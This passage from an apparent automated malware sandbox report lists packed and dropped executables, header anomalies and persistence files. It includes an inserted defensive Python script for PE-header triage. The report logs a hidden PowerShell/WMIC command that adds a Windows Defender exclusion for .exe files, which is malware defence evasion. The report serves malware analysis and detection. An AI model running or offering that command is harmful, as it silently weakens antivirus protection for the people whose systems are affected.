                        Source: Binary string: C:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006F69000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 
9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp
                        Source: file.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: file.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: file.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: file.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: file.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                        Data Obfuscation

                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Unpacked PE file: 4.2.VtmtVe55Jwcf3rOGIU1yezyh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Unpacked PE file: 11.2.yPlMO3UKyKRvoEYPhbGYOyT0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Unpacked PE file: 19.2.B46afLBMY0mokUgVdA9CQR52.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Unpacked PE file: 21.2.t7IXQJi6R3tWUMJ8f9cQzMWm.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe  Unpacked PE file: 27.2.H6XhhPCeuwAb2QQK3C3B1Lwl.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe  Unpacked PE file: 29.2.l0nXYBHJHVq6UHyy1YDO9fn3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe  Unpacked PE file: 30.2.wr6XLbv7Ijp4TImjm1ouF4U2.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe  Unpacked PE file: 34.2.6dpl9L7LbyabhVQNXZXXKjGL.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe  Unpacked PE file: 39.2.ikL90ODaFTS7N6FbOffM2D1B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe  Unpacked PE file: 41.2.G3pV8gTsWQBVrGpK4ooPrlxI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Unpacked PE file: 4.2.VtmtVe55Jwcf3rOGIU1yezyh.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Unpacked PE file: 11.2.yPlMO3UKyKRvoEYPhbGYOyT0.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Unpacked PE file: 19.2.B46afLBMY0mokUgVdA9CQR52.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe  Unpacked PE file: 21.2.t7IXQJi6R3tWUMJ8f9cQzMWm.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe  Unpacked PE file: 27.2.H6XhhPCeuwAb2QQK3C3B1Lwl.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe  Unpacked PE file: 29.2.l0nXYBHJHVq6UHyy1YDO9fn3.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe  Unpacked PE file: 34.2.6dpl9L7LbyabhVQNXZXXKjGL.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe  Unpacked PE file: 39.2.ikL90ODaFTS7N6FbOffM2D1B.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe  Unpacked PE file: 41.2.G3pV8gTsWQBVrGpK4ooPrlxI.exe.400000.0.unpack
                        Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: initial sample  Static PE information: section where entry point is pointing to: .MPRESS2
                        Source: NwvsoZspGn6vizp2axhKoY0Z.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: F9a5CAWDzjn4KX6pZMk93eNG.exe.3.dr  Static PE information: real checksum: 0x0 should be: 0x670154
                        Source: wAyxI7uUktpH5TtM4zqnMftR.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: i5XdJ65IHwp8ssJDgSUt738t.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: SZ0cEDCrvP4evlvcOCUltmHu.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 0WEfXyMPJw5gbxAkYoQ7foIu.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 6iaJRQnw7XfTmk0UWiyyOxOe.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: LuXFYkxCqJv6U5aGsy6shXnX.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 01ySZukOlUcP5NF6FSceJyuX.exe.3.dr  Static PE information: real checksum: 0x529b04 should be: 0x529bef
                        Source: 8Hs13Qx2L9GIxFG02dQv6hVO.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: z443T0kZxO5VAxRMw1cjpQdZ.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: W9xI9q4MOUfVc9D8gPa3VVtC.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: FQM2AbwszjT1lQzUoXGDxSTy.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: Xd5tydDy6Vge5DSIUsA4B8HM.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 9teA9V2job1p0o0lcg2CuXcR.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: IiFh1rXOMpGB7BnxmUig3wkQ.exe.3.dr  Static PE information: real checksum: 0x52a1e9 should be: 0x52a2d4
                        Source: a17F4G7WEa7FlwVixhjX6uYK.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: tByrAP8ibeDbCSADnquqVBQi.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: qGkRm1tZi3ZgbNWlurynDnJq.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: skOP6h6U62cLrOTEAXi7XUT4.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: mPkGObww76qlp1C09a4tgBES.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: zfeRg1KL3b6mzyGkHfaolHvL.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: eRAYqRRIfUj5yD0ovEh9HMd4.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: ugGFIzLnD3Xk89zL7XSYeDGh.exe.3.dr  Static PE information: real checksum: 0x529b04 should be: 0x529bef
                        Source: 3CfyWUQfEPMLfwgMw9RKzj9q.exe.3.dr  Static PE information: real checksum: 0x52cacd should be: 0x52cbb8
                        Source: TD0DvTWbvdprpaFzaf7f79H8.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: ra8RK0HZwqsQsFKuKAOljczn.exe.3.dr  Static PE information: real checksum: 0x524fa9 should be: 0x525094
                        Source: nMCfbx6hx0DUWGYJuDAMUAIJ.exe.3.dr  Static PE information: real checksum: 0x524fa9 should be: 0x525094
                        Source: gs73fZcRyFDJYoYkZbrtadCy.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: IWNHTSCpSFApuke51w2EhXTa.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: jZXBdg5rull5j6LgJCWVgVos.exe.3.dr  Static PE information: real checksum: 0x523e46 should be: 0x523f31
                        Source: x3HF5f4W7zVGUR0m1DVxQqdq.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 0Flev5sTDyJ3duKpLfv5ka2Z.exe.3.dr  Static PE information: real checksum: 0x52cacd should be: 0x52cbb8
                        Source: Fh7qhqxo9lqcq8fZJGpCZFiC.exe.3.dr  Static PE information: real checksum: 0x53171f should be: 0x53180a
                        Source: 0DWhHyQpdxsJp4gA1M0WjqnA.exe.3.dr  Static PE information: real checksum: 0x53171f should be: 0x53180a
                        Source: zWhvfqZrtT7TUoWor4gRArPv.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 5Q13Z1W5QdpwzXbxGFAdEXdB.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 0yHxI2NgcVq897URfu1bGLCU.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 0FR80IiNvxJZyXnpOgiDlYNV.exe.3.dr  Static PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: H6XhhPCeuwAb2QQK3C3B1Lwl.exe.3.dr  Static PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: CzCAVDbVcAMwrBna8hMGEVEa.exe.3.dr  Static PE information: real checksum: 0x523e46 should be: 0x523f31
                        Source: file.exe  Static PE information: section name: .managed
                        Source: file.exe  Static PE information: section name: _RDATA
                        Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.dr  Static PE information: section name: .MPRESS1
                        Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.dr  Static PE information: section name: .MPRESS2
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.dr  Static PE information: section name: .MPRESS1
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.dr  Static PE information: section name: .MPRESS2
                        Source: F9a5CAWDzjn4KX6pZMk93eNG.exe.3.dr  Static PE information: section name: .sxdata
                        Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.dr  Static PE information: section name: .MPRESS1
                        Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.dr  Static PE information: section name: .MPRESS2
                        Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.dr  Static PE information: section name: .MPRESS1
                        Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.dr  Static PE information: section name: .MPRESS2
                        Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.dr  Static PE information: section name: .MPRESS1
                        Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.dr  Static PE information: section name: .MPRESS2
                        Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.dr  Static PE information: section name: .MPRESS1
                        Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.dr  Static PE information: section name: .MPRESS2
                        Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.dr  Static PE information: section name: .MPRESS1
                        Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.dr  Static PE information: section name: .MPRESS2
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_0042D355 push esi; ret 4_2_0042D35E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_00409D06 push ecx; ret 4_2_00409D19
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_004275A4 push eax; ret 4_2_004275C2
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_004097B6 push ecx; ret 4_2_004097C9
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_040D1494 push 00000061h; retf 4_2_040D149C
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_040CE5D6 pushad ; retf 4_2_040CE5D7
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_040CF660 push ecx; iretd 4_2_040CF672
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_040D0E85 pushad ; retf 4_2_040D0E8C
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_040D28F8 push ebp; iretd 4_2_040D292B
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe  Code function: 4_2_040D0B6F push 2B991403h; ret 4_2_040D0B76
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_0042D355 push esi; ret 11_2_0042D35E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_00409D06 push ecx; ret 11_2_00409D19
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_004275A4 push eax; ret 11_2_004275C2
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_004097B6 push ecx; ret 11_2_004097C9
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_04121494 push 00000061h; retf 11_2_0412149C
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_0411E5D6 pushad ; retf 11_2_0411E5D7
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_0411F660 push ecx; iretd 11_2_0411F672
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_04120E85 pushad ; retf 11_2_04120E8C
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_041228F8 push ebp; iretd 11_2_0412292B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_04120B6F push 2B991403h; ret 11_2_04120B76
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_05BCC52F push esp; retf 11_2_05BCC537
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_05BD1CA2 push dword ptr [esp+ecx-75h]; iretd 11_2_05BD1CA6
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_05BB9F6D push ecx; ret 11_2_05BB9F80
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_05BD780B push eax; ret 11_2_05BD7829
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_05BCCB2D push esp; retf 11_2_05BCCB2E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe  Code function: 11_2_05BB9A1D push ecx; ret 11_2_05BB9A30
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Code function: 19_2_0042D355 push esi; ret 19_2_0042D35E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Code function: 19_2_00409D06 push ecx; ret 19_2_00409D19
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Code function: 19_2_004275A4 push eax; ret 19_2_004275C2
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Code function: 19_2_004097B6 push ecx; ret 19_2_004097C9
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe  Code function: 19_2_04191494 push 00000061h; retf 19_2_0419149C
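                        The static observations in this section (section rights before and after unpacking, the entry point sitting in .MPRESS2, packer section names, the DllCharacteristics flags, and the "real checksum ... should be" mismatches on the dropped files) all come from the PE headers and can be reproduced without executing anything. The script below is an added example written for this report, not Joe Sandbox code: it walks the COFF/optional/section headers, renders section permissions as E/R/W letters, names the section that contains AddressOfEntryPoint, decodes the mitigation flags, and recomputes the PE checksum with the same folding algorithm as CheckSumMappedFile. The sample PE it analyses is constructed inline with an MPRESS-style layout; the watch-list of packer section names is an assumption, and "stored"/"computed" below correspond to the report's "real"/"should be".

```python
"""Static PE triage for the header-level findings above. Added example, not
Joe Sandbox code; the PE it analyses is constructed here, not a report file."""
import struct

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x20, 0x40
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
                       0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
PACKER_SECTIONS = {".MPRESS1", ".MPRESS2", "UPX0", "UPX1", ".aspack", ".themida"}  # assumption: short watch-list


def section_rights(characteristics):
    """Render a section's memory permissions as the E/R/W letters used in the unpacking lines above."""
    return "".join(letter for bit, letter in ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"),
                                              (IMAGE_SCN_MEM_WRITE, "W")) if characteristics & bit)


def parse_pe(data):
    """Minimal header walk (PE32 and PE32+ share every offset used here)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    nsections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt = pe_off + 24                                   # optional header follows the 20-byte COFF header
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, hdr)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize, "rights": section_rights(chars)})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "dll_chars": struct.unpack_from("<H", data, opt + 70)[0], "sections": sections}


def pe_checksum(data):
    """CheckSumMappedFile algorithm: fold 32-bit words, skip the CheckSum field itself, add the file size."""
    cs_off = struct.unpack_from("<I", data, 0x3C)[0] + 24 + 64
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == cs_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def fix_checksum(data):
    """Return a copy with the header CheckSum set to the computed value (what a linker would have written)."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, struct.unpack_from("<I", data, 0x3C)[0] + 24 + 64, pe_checksum(data))
    return bytes(buf)


def triage(data):
    """The header facts a practitioner pulls before detonation."""
    pe = parse_pe(data)
    entry = next((s["name"] for s in pe["sections"]
                  if s["vaddr"] <= pe["entry_rva"] < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    computed = pe_checksum(data)
    return {"entry_section": entry,
            "packer_sections": [s["name"] for s in pe["sections"] if s["name"] in PACKER_SECTIONS],
            "writable_code": [s["name"] for s in pe["sections"] if "E" in s["rights"] and "W" in s["rights"]],
            "mitigations": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if pe["dll_chars"] & bit],
            "checksum_ok": pe["checksum"] == computed,
            "checksum_stored": pe["checksum"], "checksum_computed": computed}


def build_sample_pe(dll_chars=0x8140, checksum=0):
    """Constructed 32-bit PE: MPRESS-style sections, entry point in .MPRESS2, CheckSum left at 0."""
    secs = [(b".text", 0x1000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
            (b".data", 0x2000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
            (b".MPRESS1", 0x3000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
            (b".MPRESS2", 0x4000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)]
    pe_off, opt_size, hdr_size, raw_size = 0x40, 0xE0, 0x200, 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", pe_off)                   # e_lfanew at 0x3C
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<HBB", opt, 0, 0x10B, 14, 0)                          # PE32 magic, linker version
    struct.pack_into("<I", opt, 16, 0x4010)                                 # AddressOfEntryPoint in .MPRESS2
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, raw_size)           # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<II", opt, 56, 0x5000, hdr_size)                      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<IHH", opt, 64, checksum, 2, dll_chars)               # CheckSum, Subsystem, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                                     # NumberOfRvaAndSizes
    headers = bytearray(dos + coff + bytes(opt))
    body = b""
    for i, (name, vaddr, chars) in enumerate(secs):
        headers += struct.pack("<8sIIIIIIHHI", name, raw_size, vaddr, raw_size,
                               hdr_size + raw_size * i, 0, 0, 0, 0, chars)
        body += b"\x90" * raw_size                                          # NOP filler as section content
    return bytes(headers.ljust(hdr_size, b"\0")) + body


if __name__ == "__main__":
    print(triage(build_sample_pe()))
```

A checksum of 0 (as on F9a5CAWDzjn4KX6pZMk93eNG.exe above) means the field was never set; a non-zero mismatch usually means the file was modified after linking, which for a dropped binary is exactly the post-build patching or packing the report goes on to describe. Execute+write sections and an entry point outside .text are the header-level counterparts of the "changes PE section rights" and "section where entry point is pointing to" lines.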

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\urA10ZckYEEXLZZov5c00RO_.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\HDCJLf7pYcxae1KSycA6A5eR.exe
